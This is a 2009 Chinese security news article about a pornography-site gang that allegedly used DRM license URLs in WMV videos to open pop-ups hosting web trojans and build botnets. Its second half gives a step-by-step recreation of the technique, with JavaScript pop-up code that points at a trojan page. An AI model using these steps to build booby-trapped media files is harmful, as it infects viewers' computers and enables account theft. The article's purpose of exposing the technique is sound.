加入收藏·设为首页·会员中心·我要投稿·RSS
您当前的位置:首页 > 电子商务 > 支付安全

色情网站用DRM挂马敛财

时间:2009-07-23 18:32:53    来源:防骗公社  作者:happy88

        如今的挂马集团,可以说是盗号产业链中的霸主.他们掌控着挂马平台.牟取暴利。为了收集挂马资源.他们会使用各种挂马技术.甚至是研发自己的挂马技术。《电脑报》经过追踪发现一个挂马集团研究出数宇版权证书挂马的技术(也称DRM挂3〕,该挂马技术还是第一次被发现。

        安全小百科:DRM的中文全称是数字版权管理,指的是出版者用来控制被保护对象的所有权的技术,这些技术保护的对象是数字化内容,例如软件、音乐、电影等。

        “加拿太阳光国际娱乐集团”,这个声称在加拿大注册但网站服务器在美国华盛顿的公司,控制着多达20多个中文色情网站。这些网站频繁更换域名,绕过国内网络安全的防线,将淫秽内容倒给中国网民。

        这些色情网站以每年300元的年费大肆敛财,月收入估计过千万元,不过这并没有满足犯罪集团的欲望,他们还利用色情视频挂马,“拓宽”了收入来源。根据这些色情网站访问量保守计算,该集团至少已经控制近千万台“肉鸡”。

        那么加拿大阳光国际娱乐集团是通过什么方式获即大量。“肉鸡”的呢?首先.他们通过色情P2P下载网站布下诱饵,吸引那些经不住诱惑的用户访问网站,然后再诱使用户下载带木马的色情视频,木马一旦成功进入用户的电脑就会暗中进行盗号活动。与以住通过溢出攻击用户的色情视频不同,这些色情视频是通过数字版权证书传播病毒的.也被称为DRM佳马。

数字版权证书成挂马利器

        数字版权证书应用非常广泛,许多在线音乐商店都在使用,例如苹果公司的i-Tunes Store。利用DRM的方式有许多种,比如加拿大阳光国际娱乐集团就是通过Windows Media Player内置的数字版权来进行挂马的.

         当一段WMV视频被加入DRM证书之后.Windows Media Player播放这种带DRM证书的视频时会先弹出一个DRM认证网页窗口,去访问视频指定的版权认证网页。由于弹出的DRM认证网页并不具备阻止弹窗等功能,因此黑客能够利用认证网贡进行挂马,轻松逃避许多杀毒软件的追查。

         当用户点击WMV的视频后;WindowsMedia Player启动后立刻弹出了一个DRM数宇版权认证小窗口,随后又连续弹出了众多恶意网站.在这些恶意网站中,内置了各种各样的木马。

         DRM挂马还可以修改弹出网站的恶意代码,变换恶意网页中的挂马手段,即时躲过杀毒软件的查杀。即便是IE7也不能够阻止其弹出窗口,除了能拦截网页木马的安全辅助工具外,几乎没有其他办法能阻止其弹出恶意网站的窗口。

模拟数字版权证书挂马

        黑客是如何实现这种高明的挂马方法的呢?我们通过研究,将黑客DRM挂马的方式完全还原呈现了出来。

        步骤1:利用网页木马生成器生成一个SWF木马或者其他能够溢出攻击电脑的木马(越新的漏洞溢出几率越大)。接着生成溢出网页,将网页上传到自己指定的网站中(编者注:关于溢出网页的制作方法可以参考《电脑报》反击网页木马系列中使用的方法)。

         步骤2: 用JS脚本写一段弹窗代码,如果黑客愿意可以让网页弹出多个窗口,但是弹出的窗口必须指向含有恶意溢出代码的网页地址。写好弹窗代码后保存为HTML格式的网页,也上传到网站。
JS弹窗代码如下:
        <SCRIPT language=javascript>    window.open (“http://www.ruijia.cn/木马.html","","toolbar=no,location=no,
directories = no,status = no,menubar =no,
scro llbars=no, width=1,height=1");
    </script>

       步骤3: DRM挂马的关键操作步骤到了。黑客会先准备一个WMV格式视频文件,我们这里随意搜索下载一段WMV视频作为我们的诱饵。诱饵视频准备好后.下载并安装一款名为《DRM音频视频加密器》的软件,在软件界面中选择“自定义打包”选项,然后单击“源文件设置”后面的”浏览”按钮,选中我们准备好的诱饵视频文件。

        步骤4:点击“认证字符串”标签.然后在“填写认证字符串”下的“认证URL处输入我们指定的弹窗网页网址,点击“保存”按钮。

       步骤5: 回到“自定义包”标签中,点击“文件输出”下方的”选择按钮,选择DRM认证视频的输出位置。选择好后直接单击下方的“打包加密”,此时软件会弹出一个打包成功的提示,一个会弹出恶意DRM认证网页的视频文件就制作出来了。我们制作的测试视频成功地弹出了我们指定的博客页面。

文章标签: 相关文章
发表评论 共有 条评论
用户名: 密码:
验证码:   匿名发表
精彩美文推荐
栏目更新
栏目热门